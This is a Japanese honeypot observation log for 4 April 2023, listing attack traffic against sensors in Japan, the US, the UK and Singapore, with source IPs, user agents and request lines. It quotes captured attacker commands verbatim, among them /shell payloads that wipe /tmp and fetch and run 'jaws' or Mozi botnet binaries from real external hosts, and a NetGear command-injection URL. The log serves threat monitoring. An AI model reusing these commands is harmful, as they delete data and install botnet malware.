2023/04/04 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/04/04分です。

特徴

共通

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 161.35.208.230/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 161.35.208.230/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 45.81.243.34/jaws;
sh /tmp/jaws

Location:UK

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 161.35.208.230/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws

Location:SG

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
51.81.134.166に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 161.35.208.230/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://112.246.101.103:40897/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：97 (前日比：-179)
US：総アクセス数：116 (前日比：-49)
UK：総アクセス数：107 (前日比：-140)
SG：総アクセス数：89 (前日比：-1859)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	3.91.199.173	United States
1	20.231.231.59	United States
1	20.235.12.239	United States
1	27.124.12.23	Singapore
18	43.154.141.71	Singapore
2	43.245.143.49	Bangladesh
1	45.56.108.128	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
3	45.79.181.223	United States
1	45.79.181.251	United States
1	45.128.232.149	Bulgaria
2	47.92.79.105	China
1	51.77.247.119	France
1	59.58.104.107	China
1	91.223.236.167	Bosnia and Herzegovina
12	103.56.61.132	China
1	107.170.227.33	United States
2	109.237.98.226	Russia
1	115.58.92.81	China
1	120.85.112.232	China
1	125.229.42.201	Taiwan
8	135.125.217.54	France
8	135.125.246.110	France
1	138.59.219.198	Brazil
1	155.254.60.223	United Kingdom
1	167.248.133.51	United States
1	167.248.133.187	United States
1	172.104.11.4	United States
1	172.104.242.173	United States
1	172.105.128.13	United States
3	185.180.143.140	Portugal
1	185.254.196.173	Ukraine
1	186.233.73.163	Brazil
1	192.155.90.118	United States
10	193.32.162.159	Romania
1	195.178.120.44	Bulgaria
1	198.235.24.8	United States

UserAgent一覧

件数	UserAgent
30	`-`
2	`Go-http-client/1.1`
3	`Hello, world`
1	`Java/1.8.0_212`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
2	`Python-urllib/3.9`
1	`curl/7.64.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x9c\x01`
2		`\x16\x03\x01\x01\xa6\x01`
1		`\x16\x03\x01\x01\xb3\x01`
12		`\x16\x03\x01`
1		`\x16\x03\x02\x01\x99\x01`
1		`\x16\x03\x03\x01G\x01`
1		`\x16\x03\x03\x01U\x01`
1		`\x16\x03\x03\x01\x98\x01`
2		`\x16\x03\x03\x01\xa4\x01`
21	GET	`/.env`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api.json`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
10	GET	`/dispatch.asp`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/media/system/js/core.js`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]58[.]104[.]107:38593/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+161[.]35[.]208[.]230/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/tvplay/155848.html`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
18	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/public/.env`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	45.33.80.243	United States
1	45.55.0.12	United States
1	45.79.128.205	United States
3	45.79.181.104	United States
1	45.79.181.179	United States
2	45.81.243.34	Bulgaria
1	45.128.232.149	Bulgaria
1	45.142.107.249	Germany
1	51.77.247.119	France
22	54.37.79.75	France
2	74.82.47.2	United States
1	79.133.51.221	Germany
1	92.118.39.82	Romania
7	95.214.235.216	Ukraine
2	109.237.98.226	Russia
1	117.208.138.48	India
1	131.161.53.5	Honduras
1	134.122.133.97	Singapore
1	138.59.219.198	Brazil
25	139.144.52.241	United States
1	142.93.244.221	United States
2	152.89.196.54	Russia
2	162.142.125.217	United States
2	167.94.138.49	United States
2	167.248.133.125	United States
1	172.104.11.34	United States
2	172.104.11.51	United States
1	172.105.89.161	United States
2	179.43.177.242	Panama
8	185.254.196.223	Ukraine
1	192.155.90.118	United States
1	192.155.90.220	United States
11	193.32.162.159	Romania
1	196.190.64.70	Ethiopia
1	198.235.24.149	United States
1	200.225.120.4	Brazil
1	206.43.67.234	Brazil

UserAgent一覧

件数	UserAgent
22	`-`
1	`Hello World`
1	`Hello, World`
5	`Hello, world`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 12; ASUS_I005DA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36 EdgA/100.0.1185.50`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
21	`curl/7.54.0`
1	`curl/7.64.0`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x02`
12		`\x16\x03\x01`
38	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/OLOr`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/base.pl`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
11	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/nmaplowercheck1680553205`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
4	GET	`/shell?cd+/tmp;rm+-rf+*;wget+161[.]35[.]208[.]230/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/start.asp`	HTTP/1.1
1	GET	`/tvplay/155848.html`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/api/v0/id`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/public/.env`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
5	20.151.234.116	United States
1	20.241.40.18	United States
1	45.79.128.205	United States
2	45.79.172.21	United States
1	45.128.232.149	Bulgaria
1	45.142.107.249	Germany
1	51.77.247.119	France
27	51.79.29.48	Canada
1	52.162.218.19	United States
1	60.221.238.187	China
1	87.65.30.42	Belgium
1	91.191.209.142	Bulgaria
1	92.118.39.82	Romania
6	95.214.235.216	Ukraine
1	104.28.243.187	United States
2	109.237.98.226	Russia
1	117.194.169.122	India
1	120.195.133.139	China
2	152.89.196.54	Russia
2	162.142.125.13	United States
3	172.104.11.4	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.13	United States
2	179.43.177.242	Panama
2	184.105.139.68	United States
1	185.141.110.139	Turkey
3	185.180.143.81	Portugal
8	185.254.196.223	Ukraine
3	192.155.90.220	United States
1	192.241.213.75	United States
13	193.32.162.159	Romania
2	194.165.16.11	Panama
1	195.178.120.44	Bulgaria
4	198.20.69.98	United States
1	205.185.118.120	United States
1	205.210.31.134	United States

UserAgent一覧

件数	UserAgent
23	`-`
1	`Hello World`
2	`Hello, world`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0`
45	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0`
1	`curl/7.64.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
3		`\x03`
1		`\x16\x03\x01\x01H\x01`
13		`\x16\x03\x01`
1	GET	`/.env:443`	HTTP/1.1
1	GET	`/.env:8080`	HTTP/1.1
1	GET	`/.env:8081`	HTTP/1.1
1	GET	`/.env:8082`	HTTP/1.1
1	GET	`/.env:80`	HTTP/1.1
45	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
13	GET	`/dispatch.asp`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+161[.]35[.]208[.]230/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/public/.env`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	15.237.74.117	United States
1	20.55.53.144	United States
2	20.241.40.18	United States
1	45.13.227.143	Germany
2	45.33.80.243	United States
1	45.56.108.128	United States
2	45.77.239.190	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
1	45.81.243.34	Bulgaria
1	45.128.232.149	Bulgaria
1	45.142.107.249	Germany
27	51.79.29.48	Canada
1	62.8.65.212	Kenya
1	64.227.99.233	United States
2	87.251.64.11	Russia
1	91.191.209.142	Bulgaria
1	112.246.101.103	China
1	125.42.10.39	China
1	131.161.210.49	Brazil
1	134.122.184.35	Singapore
2	152.89.196.54	Russia
4	162.142.125.12	United States
2	167.94.138.49	United States
2	167.94.146.60	United States
2	167.248.133.38	United States
2	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
2	179.43.177.242	Panama
2	184.105.247.196	United States
1	185.141.110.139	Turkey
1	192.155.90.118	United States
11	193.32.162.159	Romania
1	194.113.236.177	Russia
1	198.235.24.159	United States

UserAgent一覧

件数	UserAgent
24	`-`
3	`Hello, world`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
5	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`

リクエスト内容一覧

件数	Method	Request	Protocol
3		`-`
1		`\x03`
13		`\x16\x03\x01`
1		``
32	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
11	GET	`/dispatch.asp`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+161[.]35[.]208[.]230/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//112[.]246[.]101[.]103:40897/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/tvplay/155848.html`	HTTP/1.1
1	GET	`http[:]//51[.]81[.]134[.]166/a.php?prox=http[:]//13[.]67[.]44[.]234:80`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/mgmt/tm/util/bash`	HTTP/1.1
5	PRI	`*`	HTTP/2.0